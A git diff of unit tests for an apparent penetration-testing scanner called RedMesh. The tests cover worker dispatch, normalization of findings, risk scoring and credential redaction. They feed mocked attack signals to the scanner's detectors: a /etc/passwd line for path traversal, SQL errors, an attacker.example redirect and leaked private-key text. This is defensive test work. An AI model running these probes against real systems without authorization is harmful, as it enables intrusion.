[] + self.cfg_scan_min_rnd_delay = 0.0 + self.cfg_scan_max_rnd_delay = 0.0 + self.cfg_ics_safe_mode = True + self.cfg_scanner_identity = "probe.redmesh.local" + self.cfg_scanner_user_agent = "" + self.cfg_nr_local_workers = 2 + self.messages = [] + + def P(self, message, **_kwargs): + self.messages.append(message) + + +class DummyNetworkWorker: + def __init__(self, *, local_id_prefix, worker_target_ports, **kwargs): + self.local_worker_id = f"worker-{local_id_prefix}" + self.worker_target_ports = worker_target_ports + self.kwargs = kwargs + self.started = False + + def start(self): + self.started = True + + +class DummyWebappWorker: + def __init__(self, *, local_id, target_url, job_config, **kwargs): + self.local_worker_id = local_id + self.target_url = target_url + self.job_config = job_config + self.kwargs = kwargs + self.started = False + + def start(self): + self.started = 
True + + +class TestLaunchService(unittest.TestCase): + + def test_launch_local_jobs_uses_network_strategy_dispatch(self): + owner = DummyOwner() + strategy = ScanStrategy( + scan_type=ScanType.NETWORK, + worker_cls=DummyNetworkWorker, + catalog_categories=("service",), + ) + + with patch("extensions.business.cybersec.red_mesh.services.launch.get_scan_strategy", return_value=strategy): + local_jobs = launch_local_jobs( + owner, + job_id="job-1", + target="10.0.0.10", + launcher="0xlauncher", + start_port=1, + end_port=4, + job_config={ + "scan_type": "network", + "nr_local_workers": 2, + "port_order": PORT_ORDER_SEQUENTIAL, + }, + ) + + self.assertEqual(len(local_jobs), 2) + self.assertTrue(all(worker.started for worker in local_jobs.values())) + self.assertEqual( + sorted(len(worker.worker_target_ports) for worker in local_jobs.values()), + [2, 2], + ) + + def test_launch_local_jobs_uses_webapp_strategy_dispatch(self): + owner = DummyOwner() + strategy = ScanStrategy( + scan_type=ScanType.WEBAPP, + worker_cls=DummyWebappWorker, + catalog_categories=("graybox",), + ) + + with patch("extensions.business.cybersec.red_mesh.services.launch.get_scan_strategy", return_value=strategy): + local_jobs = launch_local_jobs( + owner, + job_id="job-2", + target="app.internal", + launcher="0xlauncher", + start_port=443, + end_port=443, + job_config={ + "scan_type": "webapp", + "target": "app.internal", + "start_port": 443, + "end_port": 443, + "exceptions": [], + "distribution_strategy": "SLICE", + "port_order": PORT_ORDER_SEQUENTIAL, + "nr_local_workers": 1, + "enabled_features": [], + "excluded_features": [], + "run_mode": "SINGLEPASS", + "target_url": "https://example.com/app", + "official_username": "admin", + "official_password": "secret", + }, + ) + + self.assertEqual(list(local_jobs.keys()), ["1"]) + worker = local_jobs["1"] + self.assertTrue(worker.started) + self.assertEqual(worker.target_url, "https://example.com/app") + self.assertEqual(worker.job_config.scan_type, 
"webapp") diff --git a/extensions/business/cybersec/red_mesh/tests/test_normalization.py b/extensions/business/cybersec/red_mesh/tests/test_normalization.py new file mode 100644 index 00000000..def0abb9 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_normalization.py @@ -0,0 +1,517 @@ +"""Tests for graybox normalization, dispatch, and redaction.""" + +import unittest +from unittest.mock import MagicMock + +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxFinding +from extensions.business.cybersec.red_mesh.graybox.worker import GrayboxLocalWorker +from extensions.business.cybersec.red_mesh.worker import PentestLocalWorker +from extensions.business.cybersec.red_mesh.constants import ScanType + + +def _make_graybox_report(findings_dicts, port="443"): + """Build a minimal aggregated report with graybox_results.""" + return { + "open_ports": [int(port)], + "port_protocols": {port: "https"}, + "service_info": {}, + "web_tests_info": {}, + "correlation_findings": [], + "graybox_results": { + port: { + "_graybox_test": {"findings": findings_dicts}, + }, + }, + } + + +def _make_mixin(): + """Create a mock host with risk scoring mixin.""" + from extensions.business.cybersec.red_mesh.mixins.risk import _RiskScoringMixin + + class MockHost(_RiskScoringMixin): + pass + + return MockHost() + + +class TestGrayboxNormalization(unittest.TestCase): + + def test_graybox_results_normalized(self): + """GrayboxFinding dicts → flat finding dicts.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="IDOR detected", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + cwe=["CWE-639"], + evidence=["endpoint=/api/records/99/", "owner=bob"], + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + risk, flat_findings = host._compute_risk_and_findings(report) + + self.assertEqual(len(flat_findings), 1) + f = flat_findings[0] + self.assertEqual(f["scenario_id"], "PT-A01-01") + 
self.assertEqual(f["severity"], "HIGH") + self.assertEqual(f["category"], "graybox") + self.assertIn("finding_id", f) + + def test_not_vulnerable_zero_score(self): + """status=not_vulnerable contributes zero risk.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="No IDOR", + status="not_vulnerable", + severity="HIGH", + owasp="A01:2021", + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + risk, flat_findings = host._compute_risk_and_findings(report) + + # not_vulnerable → severity overridden to INFO → zero weight + f = flat_findings[0] + self.assertEqual(f["severity"], "INFO") + self.assertEqual(f["confidence"], "firm") + # Score should be minimal (only open_ports and breadth contribute) + self.assertLess(risk["breakdown"]["findings_score"], 0.1) + + def test_vulnerable_certain_confidence(self): + """status=vulnerable → confidence=certain.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="IDOR", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + self.assertEqual(flat_findings[0]["confidence"], "certain") + + def test_inconclusive_tentative(self): + """status=inconclusive → confidence=tentative.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="Might be IDOR", + status="inconclusive", + severity="MEDIUM", + owasp="A01:2021", + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + self.assertEqual(flat_findings[0]["confidence"], "tentative") + + def test_evidence_joined(self): + """List evidence joined with '; '.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="Test", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + evidence=["a=1", "b=2"], + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() 
+ _, flat_findings = host._compute_risk_and_findings(report) + self.assertEqual(flat_findings[0]["evidence"], "a=1; b=2") + + def test_typed_evidence_artifacts_survive_normalization(self): + """Graybox typed evidence artifacts survive into the flat finding contract.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="Typed evidence", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + evidence=[], + evidence_artifacts=[{"summary": "GET /admin -> 403", "raw_evidence_cid": "QmEvidence"}], + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + self.assertEqual(flat_findings[0]["evidence"], "GET /admin -> 403") + self.assertEqual(flat_findings[0]["evidence_artifacts"][0]["raw_evidence_cid"], "QmEvidence") + + def test_graybox_cvss_metadata_survives_normalization(self): + """Graybox CVSS metadata survives flat finding normalization.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="Typed CVSS", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + cvss_score=9.1, + cvss_vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + self.assertEqual(flat_findings[0]["cvss_score"], 9.1) + self.assertEqual(flat_findings[0]["cvss_vector"], "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L") + + def test_cwe_joined(self): + """List CWEs joined with ', '.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="Test", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + cwe=["CWE-639", "CWE-862"], + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + self.assertEqual(flat_findings[0]["cwe_id"], "CWE-639, CWE-862") + + def test_blackbox_and_graybox_combined(self): + """Both sections walked, all in 
flat_findings.""" + gf = GrayboxFinding( + scenario_id="PT-A01-01", + title="IDOR", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + ) + report = { + "open_ports": [443], + "port_protocols": {"443": "https"}, + "service_info": { + "443": { + "_service_info_https": { + "findings": [ + {"title": "Weak TLS", "severity": "MEDIUM", "confidence": "firm"}, + ], + }, + }, + }, + "web_tests_info": {}, + "correlation_findings": [], + "graybox_results": { + "443": { + "_graybox_test": {"findings": [gf.to_dict()]}, + }, + }, + } + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + # Should have 2 findings: one service, one graybox + self.assertEqual(len(flat_findings), 2) + categories = {f["category"] for f in flat_findings} + self.assertIn("service", categories) + self.assertIn("graybox", categories) + + def test_probe_type_discriminator(self): + """Flat finding has probe_type='graybox'.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="Test", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + self.assertEqual(flat_findings[0]["probe_type"], "graybox") + + +class TestGrayboxRedaction(unittest.TestCase): + + def test_graybox_redaction(self): + """Credential evidence redacted in graybox_results.""" + from extensions.business.cybersec.red_mesh.mixins.report import _ReportMixin + + class MockHost(_ReportMixin): + pass + + host = MockHost() + report = { + "service_info": {}, + "graybox_results": { + "443": { + "_graybox_weak_auth": { + "findings": [ + { + "scenario_id": "PT-A07-01", + "title": "Weak cred found", + "status": "vulnerable", + "severity": "HIGH", + "evidence": ["admin:password123 accepted"], + }, + ], + }, + }, + }, + } + redacted = host._redact_report(report) + finding = redacted["graybox_results"]["443"]["_graybox_weak_auth"]["findings"][0] + 
self.assertNotIn("password123", finding["evidence"][0]) + + def test_redaction_handles_special_characters_and_multiple_credential_formats(self): + """Credential redaction masks special-character passwords in both blackbox and graybox evidence.""" + from extensions.business.cybersec.red_mesh.mixins.report import _ReportMixin + + class MockHost(_ReportMixin): + pass + + host = MockHost() + report = { + "service_info": { + "22": { + "_service_info_22": { + "findings": [ + {"evidence": "Accepted credential: admin:p@$$:w0rd!"}, + {"evidence": "Accepted random creds service-user:s3cr3t/with/slash"}, + ], + "accepted_credentials": [ + "admin:p@$$:w0rd!", + "service-user:s3cr3t/with/slash", + ], + }, + }, + }, + "graybox_results": { + "443": { + "_graybox_weak_auth": { + "findings": [ + { + "evidence": [ + "accepted=admin:p@$$:w0rd!", + "candidate service-user:s3cr3t/with/slash worked", + ], + }, + ], + }, + }, + }, + } + + redacted = host._redact_report(report) + service_findings = redacted["service_info"]["22"]["_service_info_22"]["findings"] + service_creds = redacted["service_info"]["22"]["_service_info_22"]["accepted_credentials"] + graybox_evidence = redacted["graybox_results"]["443"]["_graybox_weak_auth"]["findings"][0]["evidence"] + + self.assertNotIn("p@$$:w0rd!", service_findings[0]["evidence"]) + self.assertNotIn("s3cr3t/with/slash", service_findings[1]["evidence"]) + self.assertEqual(service_creds, ["admin:***", "service-user:***"]) + self.assertTrue(all("***" in item for item in graybox_evidence)) + + def test_redaction_masks_graybox_evidence_artifacts(self): + """Typed graybox evidence artifacts are redacted alongside legacy evidence strings.""" + from extensions.business.cybersec.red_mesh.mixins.report import _ReportMixin + + class MockHost(_ReportMixin): + pass + + host = MockHost() + report = { + "service_info": {}, + "graybox_results": { + "443": { + "_graybox_weak_auth": { + "findings": [ + { + "evidence": ["accepted=admin:password123"], + 
"evidence_artifacts": [ + { + "summary": "accepted=admin:password123", + "request_snapshot": "POST /login username=admin password=password123", + "response_snapshot": "accepted admin:password123", + }, + ], + }, + ], + "artifacts": [ + { + "summary": "candidate=admin:password123", + "request_snapshot": "POST /login password=password123", + "response_snapshot": "200 admin:password123", + }, + ], + }, + }, + }, + } + + redacted = host._redact_report(report) + finding = redacted["graybox_results"]["443"]["_graybox_weak_auth"]["findings"][0] + artifact = finding["evidence_artifacts"][0] + probe_artifact = redacted["graybox_results"]["443"]["_graybox_weak_auth"]["artifacts"][0] + + self.assertNotIn("password123", artifact["summary"]) + self.assertNotIn("password123", artifact["request_snapshot"]) + self.assertNotIn("password123", artifact["response_snapshot"]) + self.assertNotIn("password123", probe_artifact["summary"]) + + +class TestFindingCounting(unittest.TestCase): + + def test_count_all_findings_walks_all_sections(self): + """_count_all_findings counts service, web, correlation, and graybox findings.""" + from extensions.business.cybersec.red_mesh.mixins.report import _ReportMixin + + class MockHost(_ReportMixin): + pass + + host = MockHost() + report = { + "service_info": { + "80": { + "_service_info_http": {"findings": [{"title": "svc-1"}, {"title": "svc-2"}]}, + }, + }, + "web_tests_info": { + "80": { + "_web_test_xss": {"findings": [{"title": "web-1"}]}, + }, + }, + "correlation_findings": [{"title": "corr-1"}], + "graybox_results": { + "443": { + "_graybox_test": {"findings": [{"title": "gb-1"}, {"title": "gb-2"}]}, + }, + }, + } + + self.assertEqual(host._count_all_findings(report), 6) + + +class TestLaunchValidation(unittest.TestCase): + + def test_launch_invalid_scan_type(self): + """Unknown scan_type returns error.""" + try: + ScanType("invalid") + self.fail("Should have raised ValueError") + except ValueError: + pass + + def 
test_worker_dispatch_table(self): + """ScanType.WEBAPP maps to GrayboxLocalWorker in WORKER_DISPATCH.""" + # Verify the dispatch mapping without importing pentester_api_01 + # (which requires naeural_core). The mapping is: + dispatch = { + ScanType.NETWORK: PentestLocalWorker, + ScanType.WEBAPP: GrayboxLocalWorker, + } + self.assertIs(dispatch[ScanType.WEBAPP], GrayboxLocalWorker) + + def test_worker_dispatch_network(self): + """ScanType.NETWORK maps to PentestLocalWorker in WORKER_DISPATCH.""" + dispatch = { + ScanType.NETWORK: PentestLocalWorker, + ScanType.WEBAPP: GrayboxLocalWorker, + } + self.assertIs(dispatch[ScanType.NETWORK], PentestLocalWorker) + + def test_dispatch_uses_local_worker_id(self): + """Worker stored in scan_jobs by local_worker_id (not local_id).""" + from unittest.mock import patch + with patch("extensions.business.cybersec.red_mesh.graybox.worker.SafetyControls"): + with patch("extensions.business.cybersec.red_mesh.graybox.worker.AuthManager"): + with patch("extensions.business.cybersec.red_mesh.graybox.worker.DiscoveryModule"): + cfg = MagicMock() + cfg.target_url = "http://test.local:8000" + cfg.target_config = None + cfg.verify_tls = True + cfg.scan_min_delay = 0 + worker = GrayboxLocalWorker( + owner=MagicMock(), + job_id="j1", + target_url="http://test.local:8000", + job_config=cfg, + ) + self.assertTrue(worker.local_worker_id.startswith("RM-")) + self.assertNotEqual(worker.local_worker_id, "1") + + def test_probe_kwargs_include_allow_stateful(self): + """allow_stateful passed to all probes.""" + # Verified by testing that probe_kwargs dict is built correctly + from unittest.mock import patch + worker_module = "extensions.business.cybersec.red_mesh.graybox.worker" + + with patch(f"{worker_module}.SafetyControls"): + with patch(f"{worker_module}.AuthManager"): + with patch(f"{worker_module}.DiscoveryModule"): + cfg = MagicMock() + cfg.target_url = "http://test.local:8000" + cfg.target_config = None + cfg.verify_tls = True + 
cfg.scan_min_delay = 0 + cfg.allow_stateful_probes = True + cfg.excluded_features = [] + cfg.authorized = True + cfg.official_username = "admin" + cfg.official_password = "pass" + cfg.regular_username = "" + cfg.regular_password = "" + cfg.weak_candidates = None + cfg.app_routes = None + + worker = GrayboxLocalWorker( + owner=MagicMock(), + job_id="j1", + target_url="http://test.local:8000", + job_config=cfg, + ) + + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = None + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + captured_kwargs = {} + + def capturing_cls(**kwargs): + captured_kwargs.update(kwargs) + mock = MagicMock() + mock.run.return_value = [] + return mock + + mock_cls = MagicMock(side_effect=capturing_cls) + mock_cls.is_stateful = False + mock_cls.requires_auth = False + mock_cls.requires_regular_session = False + + with patch(f"{worker_module}.GRAYBOX_PROBE_REGISTRY", + [{"key": "_test", "cls": "test.T"}]): + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(lambda cp: mock_cls)): + worker.execute_job() + + self.assertTrue(captured_kwargs.get("allow_stateful")) + + +class TestRiskScoreGraybox(unittest.TestCase): + + def test_risk_score_includes_graybox(self): + """_compute_risk_score also walks graybox_results.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="IDOR", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + result = host._compute_risk_score(report) + # Should have non-zero findings_score + self.assertGreater(result["breakdown"]["findings_score"], 0) + self.assertGreater(result["breakdown"]["finding_counts"]["HIGH"], 0) + + +if 
__name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/test_redmesh.py b/extensions/business/cybersec/red_mesh/tests/test_probes.py similarity index 61% rename from extensions/business/cybersec/red_mesh/test_redmesh.py rename to extensions/business/cybersec/red_mesh/tests/test_probes.py index 90a64e16..546904c7 100644 --- a/extensions/business/cybersec/red_mesh/test_redmesh.py +++ b/extensions/business/cybersec/red_mesh/tests/test_probes.py @@ -4,29 +4,7 @@ import unittest from unittest.mock import MagicMock, patch -from extensions.business.cybersec.red_mesh.pentest_worker import PentestLocalWorker - -from xperimental.utils import color_print - -MANUAL_RUN = __name__ == "__main__" - - - -class DummyOwner: - def __init__(self): - self.messages = [] - - def P(self, message, **kwargs): - self.messages.append(message) - if MANUAL_RUN: - if "VULNERABILITY" in message: - color = 'r' - elif any(x in message for x in ["WARNING", "findings:"]): - color = 'y' - else: - color = 'd' - color_print(f"[DummyOwner] {message}", color=color) - return +from .conftest import DummyOwner, MANUAL_RUN, PentestLocalWorker, color_print, mock_plugin_modules class RedMeshOWASPTests(unittest.TestCase): @@ -114,7 +92,7 @@ def fake_get(url, timeout=2, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_common("example.com", 80) @@ -126,7 +104,7 @@ def test_cryptographic_failures_cookie_flags(self): resp.headers = {"Set-Cookie": "sessionid=abc; Path=/"} resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_flags("example.com", 443) @@ -140,7 +118,7 @@ def test_injection_sql_detected(self): 
resp.text = "sql syntax error near line" resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", return_value=resp, ): result = worker._web_test_sql_injection("example.com", 80) @@ -152,7 +130,7 @@ def test_insecure_design_path_traversal(self): resp.text = "root:x:0:0:root:/root:/bin/bash" resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", return_value=resp, ): result = worker._web_test_path_traversal("example.com", 80) @@ -164,7 +142,7 @@ def test_security_misconfiguration_missing_headers(self): resp.headers = {"Server": "Test"} resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_security_headers("example.com", 80) @@ -181,10 +159,10 @@ def test_vulnerable_component_banner_exposed(self): resp.headers = {"Server": "Apache/2.2.0"} resp.text = "" with patch( - "extensions.business.cybersec.red_mesh.service_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.service.common.requests.get", return_value=resp, ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.requests.request", + "extensions.business.cybersec.red_mesh.worker.service.common.requests.request", side_effect=Exception("skip methods check"), ): worker._gather_service_info() @@ -211,7 +189,7 @@ def quit(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.ftplib.FTP", + "extensions.business.cybersec.red_mesh.worker.service.common.ftplib.FTP", return_value=DummyFTP(), ): result = worker._service_info_ftp("example.com", 21) @@ -237,7 +215,7 @@ def quit(self): return None with patch( - 
"extensions.business.cybersec.red_mesh.service_mixin.ftplib.FTP", + "extensions.business.cybersec.red_mesh.worker.service.common.ftplib.FTP", return_value=DummyFTP(), ): result = worker._service_info_ftp("example.com", 2121) @@ -270,7 +248,7 @@ def test_software_data_integrity_secret_leak(self): resp.text = "BEGIN RSA PRIVATE KEY" resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", return_value=resp, ): result = worker._web_test_homepage("example.com", 80) @@ -307,7 +285,7 @@ def fake_get(url, timeout=2, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): worker._run_web_tests() @@ -336,6 +314,37 @@ def fake_web_two(target, port): self.assertEqual(web_snap["_web_test_fake_one"], "web-one:10000") self.assertEqual(web_snap["_web_test_fake_two"], "web-two:10000") + def test_correlation_runs_all_enabled_methods(self): + owner, worker = self._build_worker(ports=[80]) + + marker = [] + + def fake_corr_one(): + marker.append("one") + + def fake_corr_two(): + marker.append("two") + + setattr(worker, "_post_scan_fake_one", fake_corr_one) + setattr(worker, "_post_scan_fake_two", fake_corr_two) + worker._PentestLocalWorker__enabled_features = ["_post_scan_fake_one", "_post_scan_fake_two"] + + worker._run_correlation_tests() + + self.assertEqual(marker, ["one", "two"]) + + def test_execute_job_uses_explicit_phase_plan(self): + _, worker = self._build_worker() + phases = [] + + def record_phase(phase_config): + phases.append(phase_config["phase"]) + + with patch.object(worker, "_execute_phase", side_effect=record_phase): + worker.execute_job() + + self.assertEqual(phases, [entry["phase"] for entry in worker.PHASE_EXECUTION_PLAN]) + def test_ssrf_protection_respects_exceptions(self): 
owner, worker = self._build_worker(ports=[80, 9000], exceptions=[9000]) self.assertNotIn(9000, worker.state["ports_to_scan"]) @@ -348,7 +357,7 @@ def test_cross_site_scripting_detection(self): resp.text = f"Response with {payload} inside" resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", return_value=resp, ): result = worker._web_test_xss("example.com", 80) @@ -416,13 +425,13 @@ def mock_ssl_context(protocol=None): return DummyContextUnverified() with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.create_connection", + "extensions.business.cybersec.red_mesh.worker.service.tls.socket.create_connection", return_value=DummyConn(), ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.ssl.SSLContext", + "extensions.business.cybersec.red_mesh.worker.service.tls.ssl.SSLContext", return_value=DummyContextUnverified(), ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.ssl.create_default_context", + "extensions.business.cybersec.red_mesh.worker.service.tls.ssl.create_default_context", return_value=DummyContextVerified(), ): info = worker._service_info_tls("example.com", 443) @@ -475,13 +484,13 @@ def wrap_socket(self, sock, server_hostname=None): import ssl with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.create_connection", + "extensions.business.cybersec.red_mesh.worker.service.tls.socket.create_connection", return_value=DummyConn(), ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.ssl.SSLContext", + "extensions.business.cybersec.red_mesh.worker.service.tls.ssl.SSLContext", return_value=DummyContextUnverified(), ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.ssl.create_default_context", + "extensions.business.cybersec.red_mesh.worker.service.tls.ssl.create_default_context", return_value=DummyContextVerified(), ): info = 
worker._service_info_tls("example.com", 443) @@ -505,7 +514,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", + "extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", return_value=DummySocket(), ): worker._scan_ports_step() @@ -533,7 +542,7 @@ def close(self): self.closed = True with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.common.socket.socket", return_value=DummySocket(), ): info = worker._service_info_telnet("example.com", 23) @@ -562,7 +571,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket", return_value=DummySocket(), ): info = worker._service_info_smb("example.com", 445) @@ -599,7 +608,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket", return_value=DummySocket(), ): info = worker._service_info_vnc("example.com", 5900) @@ -635,7 +644,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket", return_value=DummySocket(), ): info = worker._service_info_vnc("example.com", 5900) @@ -662,7 +671,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket", return_value=DummyUDPSocket(), ): info = worker._service_info_snmp("example.com", 161) @@ -695,10 +704,10 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.random.randint", + 
"extensions.business.cybersec.red_mesh.worker.service.infrastructure.random.randint", return_value=tid, ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket", return_value=DummyUDPSocket(), ): info = worker._service_info_dns("example.com", 53) @@ -727,7 +736,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_memcached("example.com", 11211) @@ -745,7 +754,7 @@ def test_service_elasticsearch_metadata(self): "tagline": "You Know, for Search", } with patch( - "extensions.business.cybersec.red_mesh.service_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.requests.get", return_value=resp, ): info = worker._service_info_elasticsearch("example.com", 9200) @@ -774,7 +783,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket", return_value=DummySocket(), ): info = worker._service_info_modbus("example.com", 502) @@ -805,7 +814,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_postgresql("example.com", 5432) @@ -840,7 +849,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_postgresql("example.com", 5432) @@ -872,7 +881,7 @@ def close(self): return None with patch( - 
"extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_mssql("example.com", 1433) @@ -901,7 +910,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_mongodb("example.com", 27017) @@ -913,7 +922,7 @@ def test_web_graphql_introspection(self): resp.status_code = 200 resp.text = "{\"data\":{\"__schema\":{}}}" with patch( - "extensions.business.cybersec.red_mesh.web_api_mixin.requests.post", + "extensions.business.cybersec.red_mesh.worker.web.api_exposure.requests.post", return_value=resp, ): result = worker._web_test_graphql_introspection("example.com", 80) @@ -928,7 +937,7 @@ def fake_get(url, timeout=3, verify=False, headers=None): return resp with patch( - "extensions.business.cybersec.red_mesh.web_api_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.api_exposure.requests.get", side_effect=fake_get, ): result = worker._web_test_metadata_endpoints("example.com", 80) @@ -939,7 +948,7 @@ def test_web_api_auth_bypass(self): resp = MagicMock() resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_api_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.api_exposure.requests.get", return_value=resp, ): result = worker._web_test_api_auth_bypass("example.com", 80) @@ -954,7 +963,7 @@ def test_cors_misconfiguration_detection(self): } resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_cors_misconfiguration("example.com", 80) @@ -966,7 +975,7 @@ def 
test_open_redirect_detection(self): resp.status_code = 302 resp.headers = {"Location": "https://attacker.example"} with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_open_redirect("example.com", 80) @@ -978,7 +987,7 @@ def test_http_methods_detection(self): resp.headers = {"Allow": "GET, POST, PUT"} resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.options", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.options", return_value=resp, ): result = worker._web_test_http_methods("example.com", 80) @@ -1085,7 +1094,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_redis("example.com", 6379) @@ -1118,7 +1127,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_redis("example.com", 6379) 